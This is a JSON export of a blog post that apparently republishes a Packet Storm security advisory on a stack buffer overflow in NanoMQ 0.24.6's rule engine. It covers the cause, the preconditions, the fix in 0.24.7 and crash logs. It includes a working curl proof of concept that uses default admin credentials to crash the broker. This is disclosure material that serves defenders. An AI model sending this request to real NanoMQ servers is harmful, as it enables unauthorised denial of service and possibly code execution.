{"id":33804,"date":"2026-01-02T14:44:39","date_gmt":"2026-01-02T14:44:39","guid":{"rendered":"http:\/\/localhost\/?p=33804"},"modified":"2026-01-02T14:44:39","modified_gmt":"2026-01-02T14:44:39","slug":"nanomq-0246-remote-buffer-overflow","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=33804","title":{"rendered":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369"},"content":{"rendered":"

{“lastseen”:”2026-01-02T19:36:43″,”description”:”A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a denial of service and potentially achieve remote code execution. The vulnerability requires admin privileges, but use of default…”,”published”:”2026-01-02T00:00:00″,”modified”:”2026-01-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:213369″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”NanoMQ Rules Engine Remote Buffer Overflow\\n \\n =======\\n Summary\\n =======\\n \\n A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a Denial of Service (DoS) and potentially achieve Remote Code Execution (RCE). The vulnerability requires admin privileges, but use of default credentials (admin:public) may be common, lowering the barrier to access and increasing the practical impact.\\n \\n Target: NanoMQ (emqx\/nanomq:latest-full image tested)\\n Version Affected: \u2264 0.24.6\\n \\n ============\\n How It Works\\n ============\\n \\n The vulnerability is located in the Rule Engine’s SQLite integration. When a user creates a rule with a SQLite action, NanoMQ dynamically constructs a CREATE TABLE SQL statement. The flaw stems from the unsafe use of the string copy functions.\\n \\n For the vulnerability to be exploitable, two conditions must be met:\\n \\n 1. HTTP Server Must Be Enabled: The NanoMQ HTTP server must be active to expose the \/api\/v4\/rules endpoint.\\n \\n 2. Rule Engine Must Be Compiled: The NanoMQ binary must be compiled with the Rule Engine feature enabled (-DENABLE_RULE_ENGINE=ON). This is not the default for release binaries.\\n \\n However, note that the popular emqx\/nanomq:latest-full Docker image, which has over 100,000 downloads, comes with the rule engine enabled by default, making it vulnerable if HTTP server is enabled.\\n \\n =======\\n Testing\\n =======\\n \\n Triggering the buffer overflow requires sending a POST request to the \/api\/v4\/rules endpoint. The request must contain a JSON payload with a long alias in the rawsql field.\\n \\n ===========\\n Environment\\n ===========\\n \\n docker run -d –name nanomq-test -p 8081:8081 -e NANOMQ_HTTP_SERVER_ENABLE=true emqx\/nanomq:latest-full\\n \\n ===\\n PoC\\n ===\\n \\n curl -u admin:public -X POST http:\/\/localhost:8081\/api\/v4\/rules -H \\”Content-Type: application\/json\\” -d \\”{\\\\\\”rawsql\\\\\\”: \\\\\\”SELECT qos as $(perl -e ‘print \\\\\\”A\\\\\\” x 180’ ) FROM \\\\\\\\\\\\\\”test\/topic\\\\\\\\\\\\\\”\\\\\\”, \\\\\\”actions\\\\\\”: [{\\\\\\”name\\\\\\”: \\\\\\”sqlite\\\\\\”, \\\\\\”params\\\\\\”: {\\\\\\”table\\\\\\”: \\\\\\”table\\\\\\”}}]}\\”\\n \\n After sending the request, the NanoMQ instance will crash, and the logs will show buffer overflow detection.\\n \\n ====\\n Logs\\n ====\\n \\n *** buffer overflow detected ***: terminated\\n WARN \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/apps\/broker.c:1288 broker: NanoMQ (ver 0.24.6) Serving HTTP Server on http:\/\/(null):8081\\n NanoMQ Broker is started successfully!\\n ERROR \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: near \\”table\\”: syntax error\\n \\n ERROR \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/rest_api.c:1858 post_rules_sqlite: Sqlite post error!\\n ERROR \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/nanomq_rule.c:196 nanomq_client_sqlite: SQL error: (null)\\n \\n ERROR \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/rest_api.c:1858 post_rules_sqlite: Sqlite post error!\\n ERROR \/home\/runner\/work\/nanomq\/nanomq\/nanomq\/apps\/broker.c:114 sig_handler: signal signumber: 6 received!\\n \\n ======\\n Impact\\n ======\\n \\n This vulnerability may lead to:\\n \\n – Denial of Service (DoS): A remote attacker can crash the NanoMQ broker with a single request.\\n – Remote Code Execution (RCE): A sophisticated attacker could potentially craft a payload to exploit the buffer overflow and execute arbitrary code.\\n \\n ==========\\n Mitigation\\n ==========\\n \\n The vulnerability was addressed in NanoMQ version 0.24.7 by replacing an unsafe strcpy() function with snprintf(). This ensures that all string operations are bounds-checked, preventing the buffer overflow.\\n \\n The fix was introduced in this commit:\\n – https:\/\/github.com\/nanomq\/nanomq\/commit\/f6f5d1d2c01cbd56212924a1dfb59152ac63cc81\\n \\n Users can upgrade to NanoMQ version 0.24.7 or later to mitigate this vulnerability.\\n \\n Other mitigations could include ensuring the HTTP server or Rules Engine is disabled.\\n \\n Jeremy Brown (jbrown3264\/gmail), Jan 2026″,”sourceHref”:”https:\/\/packetstorm.news\/download\/213369″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213369\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-02T19:36:43″,”description”:”A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a denial of service and potentially achieve remote code execution….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-33804","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=33804\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-02T19:36:43″,”description”:”A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a denial of service and potentially achieve remote code execution....\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=33804\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-02T14:44:39+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369\",\"datePublished\":\"2026-01-02T14:44:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804\"},\"wordCount\":753,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=33804#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804\",\"name\":\"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-02T14:44:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=33804\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33804#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=33804","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem","og_description":"{“lastseen”:”2026-01-02T19:36:43″,”description”:”A stack-based buffer overflow vulnerability exists in NanoMQ version 0.24.6, allowing remote attackers to cause a denial of service and potentially achieve remote code execution....","og_url":"https:\/\/zero.redgem.net\/?p=33804","og_site_name":"zero redgem","article_published_time":"2026-01-02T14:44:39+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=33804#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=33804"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369","datePublished":"2026-01-02T14:44:39+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=33804"},"wordCount":753,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=33804#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=33804","url":"https:\/\/zero.redgem.net\/?p=33804","name":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-02T14:44:39+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=33804#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=33804"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=33804#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 NanoMQ 0.24.6 Remote Buffer Overflow_PACKETSTORM:213369"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/33804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=33804"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/33804\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=33804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=33804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=33804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}